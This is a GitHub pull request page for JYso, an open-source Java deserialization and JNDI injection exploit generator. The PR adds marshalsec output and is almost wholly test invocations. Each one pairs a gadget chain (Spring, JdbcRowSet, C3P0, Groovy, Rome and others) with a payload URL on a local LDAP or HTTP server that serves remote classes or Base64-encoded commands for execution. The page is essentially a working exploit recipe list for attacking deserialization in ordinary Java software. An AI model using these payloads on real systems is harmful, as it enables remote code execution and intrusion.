qi4L / JYso

It can be either a JNDIExploit or a ysoserial.
GNU General Public License v3.0
1.48k stars 174 forks source link

增加Marshalsec output #57

Closed Lya0 closed 3 days ago

Lya0 commented 3 days ago

增加 marshalsec 的output 一些测试用例 -y -g SpringAbstractBeanFactoryPointcutAdvisor -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -kryo -y -g JdbcRowSet -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -jk -y -g JdbcRowSet -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -jy -y -g C3P0RefDataSource -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -jy -y -g XBean -p http://127.0.0.1:8080/ExecObject -js -y -g LazySearchEnumeration -p http://127.0.0.1:8080/ExecObject -js -y -g Resin -p http://127.0.0.1:8080/ExecObject -js -y -g Groovy -p /usr/bin/gedit -js -y -g SpringAbstractBeanFactoryPointcutAdvisor -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -js -y -g Rome -p /usr/bin/gedit -js -y -g SpringAbstractBeanFactoryPointcutAdvisor -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -ca -y -g C3P0WrapperConnPool -p http://127.0.0.1:8000/exp -ca -y -g JdbcRowSet -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -jk -y -g C3P0RefDataSource -p ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv -jk -y -g C3P0WrapperConnPool -p http://127.0.0.1:8000/exp -jk -y -g SpringAbstractBeanFactoryPointcutAdvisor -p 'ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv' -jk -y -g SpringPropertyPathFactory -p 'ldap://127.0.0.1:1389/Deserialization/CommonsCollections5/command/Base64/b3BlbiAv' -jk